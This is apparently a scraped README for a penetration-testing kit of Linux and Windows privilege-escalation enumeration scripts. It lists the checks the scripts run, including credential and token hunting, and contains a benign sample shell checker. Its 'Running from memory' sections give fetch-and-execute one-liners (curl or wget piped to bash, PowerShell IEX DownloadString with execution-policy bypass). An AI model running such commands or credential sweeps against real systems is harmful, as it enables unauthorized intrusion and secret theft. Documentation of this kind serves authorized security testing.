## https://sploitus.com/exploit?id=7CA75EAE-A0F0-5208-961E-2A8AB16A5A95
# elevate-kit
Local privilege escalation enumeration scripts for Linux and Windows.
Both tools assume you already have a foothold (a shell / session) on the target and
need to find the path from your current user to root / SYSTEM. They are read-only:
they enumerate and report, they do not modify the system or run exploits. Findings
that represent a real escalation vector are printed in red; areas that were checked
and found clean are printed in green.
## Disclaimer
For use only on systems you own or are explicitly authorized to test. Running these
scripts against systems without permission may be illegal. You are responsible for how
you use them.
## Output legend
Both scripts share the same severity markers:
| Marker | Color | Meaning |
|------------|--------|------------------------------------------------------|
| `[CRIT]` | red | Direct or likely privilege escalation vector |
| `[!]` | yellow | Worth reviewing manually; potential, not confirmed |
| `[+]`     | green  | Checked and clean; no escalation here                |
Color is enabled by default and disabled automatically when output is not a terminal.
Use `--no-color` / `-NoColor` to force it off (for example when piping to a file).
---
## Linux: linenum.sh
### Requirements
Bash and standard coreutils. Optional tools (`getcap`, `ss`, `ip`, `docker`, `kubectl`,
`curl`/`wget`) are used when present and skipped when not. No installation, no
dependencies to pull in.
### Usage
```sh
chmod +x linenum.sh
./linenum.sh # full scan, color output, report saved to ./linenum_/
./linenum.sh --quick # skip slow filesystem-wide find searches
./linenum.sh --thorough # deeper credential grep across /srv /usr/local /home
./linenum.sh -o report.txt # also save a color-stripped copy to report.txt
./linenum.sh --no-color # disable ANSI color
./linenum.sh --help
```
| Option | Description |
|-------------------|-------------------------------------------------------------------|
| `-q`, `--quick` | Skip the slow root-filesystem searches (SUID, world-writable, creds) |
| `-t`, `--thorough`| Widen the credential grep to more paths |
| `-o`, `--out FILE`| Write a color-stripped copy of the full output to `FILE` |
| `--no-color` | Disable color |
| `-h`, `--help` | Show help |
When run as root, the writable-file checks are skipped automatically (every path looks
writable to root, so the results would be meaningless). Run it as the low-privileged
user you are trying to escalate from.
### Running from memory
If you cannot or do not want to drop the file on disk:
```sh
curl -s http:///linenum.sh | bash
# or
wget -qO- http:///linenum.sh | bash
```
### What it checks
- System information: kernel, architecture, distribution, shells, full `PATH`
- Kernel exploit suggestions: version-matched candidates (DirtyCow, DirtyPipe, nf_tables,
PwnKit, Sudo Baron Samedit, glibc Looney Tunables, OverlayFS GameOver(lay)) with the
relevant CVE for each; the matches are heuristic and meant to be verified
- Kernel hardening: stack protector, KASLR, strict RWX, `ptrace_scope`, runtime ASLR
- Users and sudo: UID 0 accounts, dangerous group membership (docker, lxd, disk, shadow,
adm, sudo, wheel), `sudo -l`, readable sudoers, inline password hashes in `/etc/passwd`,
logged-in users
- Environment variables, including secrets accidentally exported
- Installed languages and useful binaries
- SUID / SGID binaries, with GTFOBins shell-escape one-liners for the exploitable ones
- File capabilities (`getcap`): `cap_setuid`, `cap_dac_read_search`, `cap_sys_admin`, etc.
- Writable sensitive files (direct escalation surface): `/etc/passwd`, `/etc/shadow`,
`/etc/group`, sudoers, `ld.so.preload` / `ld.so.conf.d`, `rc.local`, `init.d`,
`profile.d`, cron directories, systemd units and `ExecStart` binaries, `update-motd.d`,
and a writable `core_pattern`
- World-writable files and directories
- SSH: `sshd_config` exposure, readable private keys / `authorized_keys`, agent sockets in
`/tmp`, credential hits in shell history and rc files (`.netrc`, `.git-credentials`)
- Credential hunting in config files, plus high-signal key/token patterns (AWS, Google,
Slack, GitHub, private-key headers, JWTs) and database connection strings
- Backup, temp and version-control files
- Cron jobs, systemd timers, writable cron scripts and units
- Network: interfaces, routes, listening ports, loopback-only services, ARP, DNS, iptables
- NFS exports and `no_root_squash`
- Mounts, `fstab`, block devices, loaded kernel modules
- Containers: Docker / LXD group abuse, writable `docker.sock`, container detection
- Cloud metadata (IMDS) and on-disk cloud credentials
- Kubernetes service-account tokens and paths
- Processes running as root, secrets in process arguments, detached screen/tmux sessions
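As an added example (not elevate-kit's own code), the reporting pieces described above for `linenum.sh`: the `[CRIT]`/`[!]`/`[+]` legend with color auto-disabled off a terminal, the `--no-color` override, the ANSI stripping used for the `-o FILE` copy, the root skip, and the writable-sensitive-files check. The sensitive paths and flag semantics come from the README; function names and the "absent but directory writable" refinement are assumptions.

```sh
#!/bin/sh
# Added example, not elevate-kit's own code: a minimal linenum.sh-style checker.
# Paths and flag semantics follow the README; function names are assumed.

ESC=$(printf '\033')
NO_COLOR=${NO_COLOR:-0}   # set to 1 to force color off (what --no-color does)

# Color only when stdout is a terminal and color was not forced off.
color_enabled() { [ "$NO_COLOR" -eq 0 ] && [ -t 1 ]; }

paint() {  # paint <SGR code> <text>
  if color_enabled; then printf '%s[%sm%s%s[0m\n' "$ESC" "$1" "$2" "$ESC"
  else printf '%s\n' "$2"; fi
}
crit() { paint 31 "[CRIT] $*"; }   # red: direct or likely escalation vector
warn() { paint 33 "[!]    $*"; }   # yellow: needs a human to judge
ok()   { paint 32 "[+]    $*"; }   # green: checked and clean

# Drop ANSI SGR sequences, for the color-stripped copy written by -o FILE.
strip_ansi() { sed "s/${ESC}\[[0-9;]*m//g"; }

# Classify one sensitive path for the current user. Prints a marker line and
# returns 0 when clean, 1 when a direct vector was found.
check_writable() {  # check_writable <path>
  dir=$(dirname "$1")
  if [ -w "$1" ]; then crit "$1 is writable by $(id -un)"; return 1; fi
  if [ ! -e "$1" ]; then
    # Absent file in a writable directory could be created, e.g. ld.so.preload.
    if [ -w "$dir" ]; then warn "$1 absent but $dir is writable"; else ok "$1 absent"; fi
    return 0
  fi
  ok "$1 not writable"; return 0
}

# Run check_writable over a list. As root every path is writable, so the
# check is skipped, as linenum.sh does.
check_sensitive_files() {  # check_sensitive_files <path>...
  if [ "$(id -u)" -eq 0 ]; then warn "running as root; writable-file checks skipped"; return 0; fi
  rc=0
  for f in "$@"; do check_writable "$f" || rc=1; done
  return $rc
}

# Usage: source this file, then for example
#   check_sensitive_files /etc/passwd /etc/shadow /etc/sudoers /etc/ld.so.preload /etc/crontab
#   check_sensitive_files /etc/passwd /etc/shadow | strip_ansi > report.txt
```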
### Output
A summary is printed to the terminal. A full color-stripped log is written to a
timestamped directory (`linenum_/`), along with the raw lists for the larger
checks (SUID/SGID, world-writable files, candidate credential files) so you can grep
through them afterward.
---
## Windows: winenum.ps1
> In progress. The PowerShell counterpart of `linenum.sh`, using the same severity
> markers and the same red-for-vector / green-for-clean output.
### Requirements
Windows PowerShell 2.0 or later. Runs with normal user rights; no modules to install.
### Usage
```powershell
powershell -ExecutionPolicy Bypass -File .\winenum.ps1
.\winenum.ps1 -Quick
.\winenum.ps1 -Out report.txt
.\winenum.ps1 -NoColor
```
In-memory, without touching disk:
```powershell
IEX (New-Object Net.WebClient).DownloadString('http:///winenum.ps1')
```
| Option | Description |
|--------------|------------------------------------------------------|
| `-Quick` | Skip the slower filesystem and registry sweeps |
| `-Out FILE` | Write a copy of the output to `FILE` |
| `-NoColor` | Disable color |
| `-Help` | Show help |
### What it checks
- System information: OS build, architecture, installed hotfixes and missing patches
- Token privileges (`whoami /priv`): `SeImpersonatePrivilege`, `SeAssignPrimaryToken`,
`SeBackupPrivilege`, `SeRestorePrivilege`, `SeDebugPrivilege` and the techniques each enables
- Users, groups, and local administrators
- `AlwaysInstallElevated` policy (user and machine)
- Unquoted service paths
- Services with weak permissions and writable service binaries
- Writable directories in `%PATH%` and DLL hijacking candidates
- Scheduled tasks and their run-as context
- Autorun entries and startup locations
- Stored credentials: Credential Manager, `cmdkey`, autologon registry values, saved Wi-Fi keys,
unattended install files, PowerShell history
- Readable `SAM` / `SYSTEM` / `SECURITY` hive copies and Volume Shadow Copies
- UAC configuration and integrity level
- Installed software and running processes
- AV and firewall state
### Output
Same as the Linux tool: severity-marked findings to the console, with an optional saved
copy via `-Out`.
---
## Notes
- Pair the SUID/SGID and capabilities output with [GTFOBins](https://gtfobins.github.io)
to turn a flagged binary into a shell.
- For short-lived root processes and cron jobs that the static scan cannot catch, run
[pspy](https://github.com/DominicBreuker/pspy) alongside it.
- `[!]` items are not failures; they are things the script cannot judge for you and that
depend on context.
## License
MIT. No warranty. Use at your own risk.